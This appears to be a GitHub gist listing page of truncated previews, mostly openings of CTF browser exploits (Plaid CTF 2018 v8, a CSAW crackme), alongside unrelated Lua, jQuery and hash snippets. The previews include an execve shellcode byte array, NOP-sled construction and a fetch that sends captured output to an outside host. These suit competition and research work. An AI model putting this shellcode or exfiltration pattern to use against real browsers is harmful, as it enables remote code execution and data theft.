This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- TODO: move util functions to common.lua | |
| local charts = {} | |
| local passed = false | |
| local desw = 770 | |
| local desh = 800 | |
| local moveX = 0 | |
| local moveY = 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * This exploit is targeting linux, tested on ubuntu 18.04 | |
| * Techniques should generally work on other OSs but I don't have any to test easily | |
| */ | |
| // Debugging functions | |
| if (this.debug === undefined) | |
| this.debug = ()=>{} | |
| if (this.cc === undefined) | |
| this.cc = ()=>{} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe> | |
| <script> | |
| let i=0; | |
| window.addEventListener("message", function(event) { | |
| msg = event.data; | |
| console.log("attacker got ",msg); | |
| if (msg.id == 0) { | |
| a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*'); | |
| } else if (msg.id == 1) { | |
| fetch("http://itszn.com/?flag="+msg.output); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5]; | |
| let conva = new ArrayBuffer(8) | |
| let convi = new Uint32Array(conva); | |
| let convf = new Float64Array(conva); | |
| function i2f(i) { | |
| convi[0] = i%0x100000000; | |
| convi[1] = i/0x100000000; | |
| return convf[0]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */ | |
| !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Load Int library, thanks saelo! | |
| load('util.js'); | |
| load('int64.js'); | |
| // Helpers to convert from float to in a few random places | |
| var conva = new ArrayBuffer(8); | |
| var convf = new Float64Array(conva); | |
| var convi = new Uint32Array(conva); | |
| var convi8 = new Uint8Array(conva); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */ | |
| /* ### Utils, thanks saelo ### */ | |
| // | |
| // Tiny module that provides big (64bit) integers. | |
| // | |
| // Copyright (c) 2016 Samuel Groß | |
| // |
itszn
/ gist:0eaac8657401d08f3b9d25ffc87875d7
Created
February 26, 2018 17:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } } | |
| var sc = []; | |
| for (var i=0; i<0x480; i++) { | |
| sc.push(0x90); | |
| } | |
| //sc.push(0xcc); | |
| //sc.push(0xeb); | |
| //sc.push(0xfe); |
NewerOlder